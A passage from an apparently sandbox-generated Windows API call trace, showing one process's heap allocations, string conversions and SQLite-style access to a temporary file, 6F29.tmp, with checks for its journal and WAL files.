(HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ac0) returned 0x54 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929b20 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x822 [0163.026] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a350 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x5c [0163.026] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929a50, cbMultiByte=-1, lpWideCharStr=0x392a350, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp") returned 46 [0163.026] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x395b8c8 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0163.026] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", nBufferLength=0x31, lpBuffer=0x395b8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", lpFilePart=0x0) returned 0x2d [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x5c [0163.026] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0163.026] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a350 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", cchWideChar=-1, lpMultiByteStr=0x392a350, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp", lpUsedDefaultChar=0x0) returned 46 [0163.026] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0163.027] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x2e [0163.027] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a350 | out: hHeap=0x2dc0000) returned 1 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a350 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a350) returned 0x281 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x822 [0163.027] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.027] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a5e0 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.027] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a538, cbMultiByte=-1, lpWideCharStr=0x392a5e0, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp") returned 46 [0163.027] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df0f4 | out: lpFileInformation=0x2df0f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4685910, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe4685910, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x98d1e730, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00)) returned 1 [0163.027] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x5c [0163.027] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x394c1b8 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a5e0 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929b20 [0163.027] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.027] ReadFile (in: hFile=0x154, lpBuffer=0x2df214, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2df1bc, lpOverlapped=0x2df19c | out: lpBuffer=0x2df214*, lpNumberOfBytesRead=0x2df1bc*=0x64, lpOverlapped=0x2df19c) returned 1 [0163.027] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929f28 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x400 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x400 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a660 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a660) returned 0x74 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x394d1c0 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394d1c0) returned 0x400 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x400 [0163.028] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x74 [0163.028] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a5e0 | out: hHeap=0x2dc0000) returned 1 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394c1b8) returned 0x1000 [0163.028] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394c1b8 | out: hHeap=0x2dc0000) returned 1 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a5e0 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a5e0) returned 0x54 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a6e0 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6e0) returned 0x54 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x394b988 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a840 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0163.028] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x392bf70 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.028] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.077] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a50) returned 0x2f [0163.077] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a50 | out: hHeap=0x2dc0000) returned 1 [0163.077] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b878) returned 0xb5 [0163.077] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b878 | out: hHeap=0x2dc0000) returned 1 [0163.077] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x28 [0163.077] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b848 | out: hHeap=0x2dc0000) returned 1 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a798 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xe [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x394b848 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b848) returned 0x50 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a780 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0xa [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x394b8a0 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b8a0) returned 0x80 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a7f8 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xa [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a960 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a960) returned 0xe [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a918 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a918) returned 0xd [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a8b8 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0x9 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929b20 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0xe0 [0163.078] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.078] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.078] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0xe0 [0163.079] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.079] LockFileEx (in: hFile=0x154, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7a8 | out: lpOverlapped=0x2de7a8) returned 1 [0163.079] LockFileEx (in: hFile=0x154, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de79c | out: lpOverlapped=0x2de79c) returned 1 [0163.079] UnlockFileEx (in: hFile=0x154, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de7ac | out: lpOverlapped=0x2de7ac) returned 1 [0163.079] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0163.079] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x3929b20 [0163.079] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x6c [0163.079] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a567, cbMultiByte=-1, lpWideCharStr=0x3929b20, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-journal") returned 54 [0163.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2de7ac | out: lpFileInformation=0x2de7ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.079] GetLastError () returned 0x2 [0163.079] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x6c [0163.079] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b20 | out: hHeap=0x2dc0000) returned 1 [0163.079] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0163.079] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0163.079] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.079] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a59d, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-wal") returned 50 [0163.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6F29.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6f29.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.079] GetLastError () returned 0x2 [0163.080] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0163.080] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0163.080] GetFileSize (in: hFile=0x154, lpFileSizeHigh=0x2de7e8 | out: lpFileSizeHigh=0x2de7e8*=0x0) returned 0x1c00 [0163.080] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c80) returned 0x395c8b0 [0163.080] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x5c80 [0163.080] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0x5c80 [0163.080] ReadFile (in: hFile=0x154, lpBuffer=0x3962090, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x2de7c4, lpOverlapped=0x2de7a4 | out: lpBuffer=0x3962090*, lpNumberOfBytesRead=0x2de7c4*=0x400, lpOverlapped=0x2de7a4) returned 1 [0163.080] _aulldvrm () returned 0x0 [0163.080] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5) returned 0x394b928 [0163.080] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b928) returned 0x5 [0163.080] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929b20 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b20) returned 0x50 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392aa08 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392aa08) returned 0x10 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929b78 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b78) returned 0x80 [0163.081] _aulldvrm () returned 0x0 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x394ba50 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x18 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x34) returned 0x392af80 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0b0 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x70) returned 0x3929c00 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c00) returned 0x70 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a978 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a978) returned 0x10 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0163.081] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.081] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x18 [0163.081] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba50 | out: hHeap=0x2dc0000) returned 1 [0163.081] _aulldvrm () returned 0x0 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x394ba50 [0163.081] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x18 [0163.081] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x34) returned 0x392af80 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a0b0 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x70) returned 0x3929c78 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c78) returned 0x70 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c78) returned 0x70 [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c78 | out: hHeap=0x2dc0000) returned 1 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1c [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x18 [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394ba50 | out: hHeap=0x2dc0000) returned 1 [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x12) returned 0x394ba50 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba50) returned 0x12 [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a9a8 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9a8) returned 0x10 [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x3929c78 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c78) returned 0xe0 [0163.082] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3949438 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3949438) returned 0x3fc [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3949438 | out: hHeap=0x2dc0000) returned 1 [0163.082] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c78) returned 0xe0 [0163.082] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c78 | out: hHeap=0x2dc0000) returned 1 [0163.082] _aulldvrm () returned 0x0 [0163.082] _aulldvrm () returned 0x0 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x8) returned 0x392a640 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a640) returned 0x8 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x3929c78 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c78) returned 0x50 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x15) returned 0x394ba30 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394ba30) returned 0x15 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929cd0 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929cd0) returned 0x80 [0163.083] _aulldvrm () returned 0x0 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1b) returned 0x394a0b0 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1b [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3d) returned 0x394a860 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3d [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a088 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a088) returned 0x1c [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x73) returned 0x3929d58 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929d58) returned 0x73 [0163.083] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a9c0 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9c0) returned 0x10 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a860) returned 0x3d [0163.083] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a860 | out: hHeap=0x2dc0000) returned 1 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a088) returned 0x1c [0163.083] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a088 | out: hHeap=0x2dc0000) returned 1 [0163.083] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a0b0) returned 0x1b [0163.083] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a0b0 | out: hHeap=0x2dc0000) returned 1 [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a9d8 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9d8) returned 0xe [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a9f0 [0163.084] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a9f0) returned 0xa [0163.084] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb) returned 0x392a7b0 [0163.084] 